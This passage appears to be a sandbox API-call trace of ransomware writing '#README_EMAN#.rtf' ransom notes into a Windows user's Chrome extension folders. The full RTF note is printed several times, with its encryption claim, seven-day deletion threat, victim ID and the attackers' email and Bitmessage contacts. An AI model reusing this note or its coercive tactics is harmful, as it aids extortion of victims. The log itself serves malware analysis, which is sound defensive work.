\\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7f\x03\r", lpUsedDefaultChar=0x0) returned 8717 [0297.641] WriteFile (in: hFile=0x294, lpBuffer=0x24866c8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x24866c8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0297.642] CloseHandle (hObject=0x294) returned 1 [0297.642] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\#readme_eman#.rtf")) returned 0xffffffff [0297.642] GetLastError () returned 0x2 [0297.642] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\id\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x294 [0297.685] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.685] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0297.685] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef4ad8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 